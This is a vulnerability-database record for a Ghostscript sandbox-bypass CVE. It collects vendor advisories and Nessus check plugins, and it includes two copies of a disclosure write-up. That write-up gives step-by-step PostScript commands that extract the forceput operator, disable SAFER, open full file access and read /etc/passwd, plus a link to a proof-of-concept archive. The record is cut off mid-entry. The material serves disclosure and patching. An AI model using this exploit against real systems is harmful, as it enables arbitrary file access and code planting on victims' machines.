ID CVE-2018-17961 Type cve Reporter cve@mitre.org Modified 2019-10-03T00:03:00
Description
Artifex Ghostscript 9.25 and earlier allows attackers to bypass a sandbox protection mechanism via vectors involving errorhandler setup. NOTE: this issue exists because of an incomplete fix for CVE-2018-17183.
{"exploitdb": [{"lastseen": "2018-10-09T20:29:50", "description": "ghostscript - executeonly Bypass with errorhandler Setup. CVE-2018-17961. Local exploit for Linux platform. Tags: Local", "published": "2018-10-09T00:00:00", "type": "exploitdb", "title": "ghostscript - executeonly Bypass with errorhandler Setup", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17961"], "modified": "2018-10-09T00:00:00", "id": "EDB-ID:45573", "href": "https://www.exploit-db.com/exploits/45573/", "sourceData": "While documenting bug 1675, I noticed another problem with errordict in ghostscript. Full working exploit that works in the last few versions is attached, viewing it in evince, imagemagick, gimp, okular, etc should add a line to ~/.bashrc. Additionally, because nautilus will automatically invoke evince-thumbnailer without any user-interaction, just browsing a website is enough to trigger the vulnerability.\r\n\r\ntaviso@ubuntu:~$ convert exploit.jpg output.jpg\r\ntaviso@ubuntu:~$ tail -1 ~/.bashrc\r\necho pwned by postscript\r\n\r\nGood news: If your distro ships gnome-desktop 3.25.90 or later and wasn't bananas enough to disable sandboxing (yes, some are really doing that, see bug 1643 ), I don't know of any way to trigger automatic exploitation. If you open the file manually, you're still in trouble though.\r\n\r\nOne of the core access control features in postscript is the ability to mark procedures executeonly, this prevents users from peeking inside system routines and getting references to powerful operators they shouldn't have access to. I have a full description of how the executeonly mechanism works in bug 1675.\r\n\r\nUntil recently you could install an error handler in errordict and if you cause an executeonly procedure to stop (\"stop\" is the postscript term for \"throw an exception\"), that would expose the faulting operator to the error handler. That is no longer possible, because errordict is ignored in the -dSAFER sandbox.\r\n\r\nUnfortunately, the fix was incomplete, because you could still make the invocation of the errorhandler itself stop by filling up the stack with junk and making it /stackoverflow.\r\n\r\nOne way to exploit this is to find an executeonly procedure that can stop in two different ways, you trigger the first exception and then you make calling the errorhandler stop (/stackoverflow or /execoverflow will do). When that fails the operand stack is left in an inconsistent state, because ghostscript was trying to set up the errorhandler but failed. \r\n\r\nHere is how to exploit it:\r\n\r\n% first, fill up the stack with junk so there is only a tiny bit of room for the errorhandler\r\nGS>0 1 300368 {} for\r\n\r\n% We can make /switch_to_normal_marking_ops fail by making pdfopdict a non-dictionary\r\nGS<300369>/pdfopdict null def\r\n\r\n% call /switch_to_normal_marking_ops (which is executeonly)\r\nGS<300369>GS_PDF_ProcSet /switch_to_normal_marking_ops get stopped\r\n\r\n% that failed because of /typecheck writing to pdfopdict\r\nGS<2>==\r\ntrue\r\n\r\n% And if we look at the last few elements of the saved stack...\r\nGS<1>dup dup length 10 sub 10 getinterval ==\r\n[300364 300365 300366 300367 300368 null /m {normal_m} --.forceput-- /typecheck]\r\n\r\n% The failed operator is on there ready to be passed to the errorhandler.\r\n\r\nforceput is a very powerful operator that ignores all access controls, we can extract it from the stack, and then do whatever we like.\r\n\r\n% Lets disable SAFER and give ourselves access to the whole filesystem (including .bashrc, ssh keys, chrome cookies, everything)\r\nsystemdict /SAFER false forceput\r\nsystemdict /userparams get /PermitFileControl [(*)] forceput\r\nsystemdict /userparams get /PermitFileWriting [(*)] forceput\r\nsystemdict /userparams get /PermitFileReading [(*)] forceput\r\n\r\nPutting it all together, here is reading /etc/passwd just to demo:\r\n\r\n$ ./gs -dSAFER -f test.ps \r\nGPL Ghostscript GIT PRERELEASE 9.26 (2018-09-13)\r\nCopyright (C) 2018 Artifex Software, Inc. All rights reserved.\r\nThis software comes with NO WARRANTY: see the file PUBLIC for details.\r\n(root:x:0:0:root:/root:/bin/bash)\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45573.zip", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45573/"}], "zdt": [{"lastseen": "2018-10-11T16:51:19", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2018-10-10T00:00:00", "title": "ghostscript - executeonly Bypass with errorhandler Setup Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17961"], "modified": "2018-10-10T00:00:00", "id": "1337DAY-ID-31286", "href": "https://0day.today/exploit/description/31286", "sourceData": "While documenting bug 1675, I noticed another problem with errordict in ghostscript. Full working exploit that works in the last few versions is attached, viewing it in evince, imagemagick, gimp, okular, etc should add a line to ~/.bashrc. Additionally, because nautilus will automatically invoke evince-thumbnailer without any user-interaction, just browsing a website is enough to trigger the vulnerability.\r\n \r\n[email\u00a0protected]:~$ convert exploit.jpg output.jpg\r\n[email\u00a0protected]:~$ tail -1 ~/.bashrc\r\necho pwned by postscript\r\n \r\nGood news: If your distro ships gnome-desktop 3.25.90 or later and wasn't bananas enough to disable sandboxing (yes, some are really doing that, see bug 1643 ), I don't know of any way to trigger automatic exploitation. If you open the file manually, you're still in trouble though.\r\n \r\nOne of the core access control features in postscript is the ability to mark procedures executeonly, this prevents users from peeking inside system routines and getting references to powerful operators they shouldn't have access to. I have a full description of how the executeonly mechanism works in bug 1675.\r\n \r\nUntil recently you could install an error handler in errordict and if you cause an executeonly procedure to stop (\"stop\" is the postscript term for \"throw an exception\"), that would expose the faulting operator to the error handler. That is no longer possible, because errordict is ignored in the -dSAFER sandbox.\r\n \r\nUnfortunately, the fix was incomplete, because you could still make the invocation of the errorhandler itself stop by filling up the stack with junk and making it /stackoverflow.\r\n \r\nOne way to exploit this is to find an executeonly procedure that can stop in two different ways, you trigger the first exception and then you make calling the errorhandler stop (/stackoverflow or /execoverflow will do). When that fails the operand stack is left in an inconsistent state, because ghostscript was trying to set up the errorhandler but failed. \r\n \r\nHere is how to exploit it:\r\n \r\n% first, fill up the stack with junk so there is only a tiny bit of room for the errorhandler\r\nGS>0 1 300368 {} for\r\n \r\n% We can make /switch_to_normal_marking_ops fail by making pdfopdict a non-dictionary\r\nGS<300369>/pdfopdict null def\r\n \r\n% call /switch_to_normal_marking_ops (which is executeonly)\r\nGS<300369>GS_PDF_ProcSet /switch_to_normal_marking_ops get stopped\r\n \r\n% that failed because of /typecheck writing to pdfopdict\r\nGS<2>==\r\ntrue\r\n \r\n% And if we look at the last few elements of the saved stack...\r\nGS<1>dup dup length 10 sub 10 getinterval ==\r\n[300364 300365 300366 300367 300368 null /m {normal_m} --.forceput-- /typecheck]\r\n \r\n% The failed operator is on there ready to be passed to the errorhandler.\r\n \r\nforceput is a very powerful operator that ignores all access controls, we can extract it from the stack, and then do whatever we like.\r\n \r\n% Lets disable SAFER and give ourselves access to the whole filesystem (including .bashrc, ssh keys, chrome cookies, everything)\r\nsystemdict /SAFER false forceput\r\nsystemdict /userparams get /PermitFileControl [(*)] forceput\r\nsystemdict /userparams get /PermitFileWriting [(*)] forceput\r\nsystemdict /userparams get /PermitFileReading [(*)] forceput\r\n \r\nPutting it all together, here is reading /etc/passwd just to demo:\r\n \r\n$ ./gs -dSAFER -f test.ps \r\nGPL Ghostscript GIT PRERELEASE 9.26 (2018-09-13)\r\nCopyright (C) 2018 Artifex Software, Inc. All rights reserved.\r\nThis software comes with NO WARRANTY: see the file PUBLIC for details.\r\n(root:x:0:0:root:/root:/bin/bash)\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45573.zip\n\n# 0day.today [2018-10-11] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31286"}], "archlinux": [{"lastseen": "2020-09-22T18:36:41", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-18284"], "description": "Arch Linux Security Advisory ASA-201811-3\n=========================================\n\nSeverity: High\nDate : 2018-11-06\nCVE-ID : CVE-2018-17961 CVE-2018-18073 CVE-2018-18284\nPackage : ghostscript\nType : sandbox escape\nRemote : Yes\nLink : https://security.archlinux.org/AVG-786\n\nSummary\n=======\n\nThe package ghostscript before version 9.25-4 is vulnerable to sandbox\nescape.\n\nResolution\n==========\n\nUpgrade to 9.25-4.\n\n# pacman -Syu \"ghostscript>=9.25-4\"\n\nThe problems have been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2018-17961 (sandbox escape)\n\nArtifex Ghostscript 9.25 and earlier allows attackers to bypass a\nsandbox protection mechanism via vectors involving errorhandler setup.\n\n- CVE-2018-18073 (sandbox escape)\n\nArtifex Ghostscript allows attackers to bypass a sandbox protection\nmechanism by leveraging exposure of system operators in the saved\nexecution stack in an error object.\n\n- CVE-2018-18284 (sandbox escape)\n\nArtifex Ghostscript 9.25 and earlier allows attackers to bypass a\nsandbox protection mechanism via vectors involving the 1Policy\noperator.\n\nImpact\n======\n\nA remote attacker is able to escape the sandbox via a specially crafted\nPostScript document.\n\nReferences\n==========\n\nhttps://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a54c9e61e7d02bbc620bcba9b1c208462a876afb\nhttps://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a5a9bf8c6a63aa4ac6874234fe8cd63e72077291\nhttps://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a6807394bd94b708be24758287b606154daaaed9\nhttps://www.openwall.com/lists/oss-security/2018/10/09/4\nhttps://bugs.chromium.org/p/project-zero/issues/detail?id=1682&desc=2\nhttps://bugs.ghostscript.com/show_bug.cgi?id=699816\nhttps://lists.debian.org/debian-lts-announce/2018/10/msg00013.html\nhttps://www.exploit-db.com/exploits/45573/\nhttps://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=34cc326eb2c5695833361887fe0b32e8d987741c\nhttp://packetstormsecurity.com/files/149758/Ghostscript-Exposed-System-Operators.html\nhttp://www.openwall.com/lists/oss-security/2018/10/10/12\nhttps://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=8d19fdf63f91f50466b08f23e2d93d37a4c5ea0b\nhttps://www.openwall.com/lists/oss-security/2018/10/16/2\nhttps://bugs.chromium.org/p/project-zero/issues/detail?id=1696\nhttps://bugs.ghostscript.com/show_bug.cgi?id=699963\nhttps://security.archlinux.org/CVE-2018-17961\nhttps://security.archlinux.org/CVE-2018-18073\nhttps://security.archlinux.org/CVE-2018-18284", "modified": "2018-11-06T00:00:00", "published": "2018-11-06T00:00:00", "id": "ASA-201811-3", "href": "https://security.archlinux.org/ASA-201811-3", "type": "archlinux", "title": "[ASA-201811-3] ghostscript: sandbox escape", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-08-12T00:51:45", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-18284"], "description": "Package : ghostscript\nVersion : 9.06~dfsg-2+deb8u11\nCVE ID : CVE-2018-17961 CVE-2018-18073 CVE-2018-18284\nDebian Bug : 910678 910758 911175\n\nThis is a follow-up update for the recently discovered -dSAFER issues\nreported by Tavis Ormandy.\n\nTavis Ormandy discovered multiple vulnerabilites in Ghostscript, an\ninterpreter for the PostScript language, which could result in denial of\nservice, the creation of files or the execution of arbitrary code if a\nmalformed Postscript file is processed (despite the dSAFER sandbox being\nenabled).\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n9.06~dfsg-2+deb8u11.\n\nWe recommend that you upgrade your ghostscript packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 11, "modified": "2018-10-22T12:22:59", "published": "2018-10-22T12:22:59", "id": "DEBIAN:DLA-1552-1:94487", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201810/msg00013.html", "title": "[SECURITY] [DLA 1552-1] ghostscript security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-12T01:02:26", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-18284", "CVE-2018-11645"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4336-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nNovember 10, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : ghostscript\nCVE ID : CVE-2018-11645 CVE-2018-17961 CVE-2018-18073 CVE-2018-18284\nDebian Bug : 910678 910758 911175\n\nSeveral vulnerabilities were discovered in Ghostscript, the GPL\nPostScript/PDF interpreter, which may result in denial of service,\ndisclosure of existence and size of arbitrary files, or the execution of\narbitrary code if a malformed Postscript file is processed (despite the\ndSAFER sandbox being enabled).\n\nThis update rebases ghostscript for stretch to the upstream version 9.25\nwhich includes additional non-security related changes.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 9.25~dfsg-0+deb9u1.\n\nWe recommend that you upgrade your ghostscript packages.\n\nFor the detailed security status of ghostscript please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/ghostscript\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 13, "modified": "2018-11-10T15:45:43", "published": "2018-11-10T15:45:43", "id": "DEBIAN:DSA-4336-1:926B0", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00268.html", "title": "[SECURITY] [DSA 4336-1] ghostscript security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:39:47", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-18284"], "description": "Tavis Ormandy discovered multiple security issues in Ghostscript. If a user \nor automated system were tricked into processing a specially crafted file, \na remote attacker could possibly use these issues to access arbitrary \nfiles, execute arbitrary code, or cause a denial of service.", "edition": 6, "modified": "2018-10-30T00:00:00", "published": "2018-10-30T00:00:00", "id": "USN-3803-1", "href": "https://ubuntu.com/security/notices/USN-3803-1", "title": "Ghostscript vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-12T09:39:57", "description": "This is a follow-up update for the recently discovered -dSAFER issues\nreported by Tavis Ormandy.\n\nTavis Ormandy discovered multiple vulnerabilites in Ghostscript, an\ninterpreter for the PostScript language, which could result in denial\nof service, the creation of files or the execution of arbitrary code\nif a malformed Postscript file is processed (despite the dSAFER\nsandbox being enabled).\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n9.06~dfsg-2+deb8u11.\n\nWe recommend that you upgrade your ghostscript packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 21, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2018-10-23T00:00:00", "title": "Debian DLA-1552-1 : ghostscript security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-18284"], "modified": "2018-10-23T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libgs9", "cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:ghostscript", "p-cpe:/a:debian:debian_linux:ghostscript-x", "p-cpe:/a:debian:debian_linux:ghostscript-doc", "p-cpe:/a:debian:debian_linux:ghostscript-dbg", "p-cpe:/a:debian:debian_linux:libgs-dev", "p-cpe:/a:debian:debian_linux:libgs9-common"], "id": "DEBIAN_DLA-1552.NASL", "href": "https://www.tenable.com/plugins/nessus/118313", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1552-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118313);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2018-17961\", \"CVE-2018-18073\", \"CVE-2018-18284\");\n script_xref(name:\"IAVB\", value:\"2019-B-0081-S\");\n\n script_name(english:\"Debian DLA-1552-1 : ghostscript security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is a follow-up update for the recently discovered -dSAFER issues\nreported by Tavis Ormandy.\n\nTavis Ormandy discovered multiple vulnerabilites in Ghostscript, an\ninterpreter for the PostScript language, which could result in denial\nof service, the creation of files or the execution of arbitrary code\nif a malformed Postscript file is processed (despite the dSAFER\nsandbox being enabled).\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n9.06~dfsg-2+deb8u11.\n\nWe recommend that you upgrade your ghostscript packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.debian.org/debian-lts-announce/2018/10/msg00013.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/jessie/ghostscript\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ghostscript-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ghostscript-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ghostscript-x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgs-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgs9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgs9-common\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/23\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"ghostscript\", reference:\"9.06~dfsg-2+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ghostscript-dbg\", reference:\"9.06~dfsg-2+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ghostscript-doc\", reference:\"9.06~dfsg-2+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ghostscript-x\", reference:\"9.06~dfsg-2+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgs-dev\", reference:\"9.06~dfsg-2+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgs9\", reference:\"9.06~dfsg-2+deb8u11\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgs9-common\", reference:\"9.06~dfsg-2+deb8u11\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-18T10:57:31", "description": "Tavis Ormandy discovered multiple security issues in Ghostscript. If a\nuser or automated system were tricked into processing a specially\ncrafted file, a remote attacker could possibly use these issues to\naccess arbitrary files, execute arbitrary code, or cause a denial of\nservice.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 20, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2018-10-31T00:00:00", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 18.04 LTS / 18.10 : Ghostscript vulnerabilities (USN-3803-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-18284"], "modified": "2018-10-31T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libgs9", "p-cpe:/a:canonical:ubuntu_linux:ghostscript", "cpe:/o:canonical:ubuntu_linux:18.10", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3803-1.NASL", "href": "https://www.tenable.com/plugins/nessus/118567", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3803-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118567);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/17\");\n\n script_cve_id(\"CVE-2018-17961\", \"CVE-2018-18073\", \"CVE-2018-18284\");\n script_xref(name:\"USN\", value:\"3803-1\");\n script_xref(name:\"IAVB\", value:\"2019-B-0081-S\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 18.04 LTS / 18.10 : Ghostscript vulnerabilities (USN-3803-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Tavis Ormandy discovered multiple security issues in Ghostscript. If a\nuser or automated system were tricked into processing a specially\ncrafted file, a remote attacker could possibly use these issues to\naccess arbitrary files, execute arbitrary code, or cause a denial of\nservice.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3803-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected ghostscript and / or libgs9 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgs9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2020 Canonical, Inc. / NASL script (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04|18\\.04|18\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 18.04 / 18.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"ghostscript\", pkgver:\"9.25~dfsg+1-0ubuntu0.14.04.2\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libgs9\", pkgver:\"9.25~dfsg+1-0ubuntu0.14.04.2\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"ghostscript\", pkgver:\"9.25~dfsg+1-0ubuntu0.16.04.2\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libgs9\", pkgver:\"9.25~dfsg+1-0ubuntu0.16.04.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"ghostscript\", pkgver:\"9.25~dfsg+1-0ubuntu0.18.04.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libgs9\", pkgver:\"9.25~dfsg+1-0ubuntu0.18.04.2\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"ghostscript\", pkgver:\"9.25~dfsg+1-0ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"libgs9\", pkgver:\"9.25~dfsg+1-0ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ghostscript / libgs9\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-22T17:24:27", "description": "Several vulnerabilities were discovered in Ghostscript, the GPL\nPostScript/PDF interpreter, which may result in denial of service,\ndisclosure of existence and size of arbitrary files, or the execution\nof arbitrary code if a malformed Postscript file is processed (despite\nthe dSAFER sandbox being enabled).\n\nThis update rebases ghostscript for stretch to the upstream version\n9.25 which includes additional non-security related changes.", "edition": 18, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2018-11-13T00:00:00", "title": "Debian DSA-4336-1 : ghostscript - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-18284", "CVE-2018-11645"], "modified": 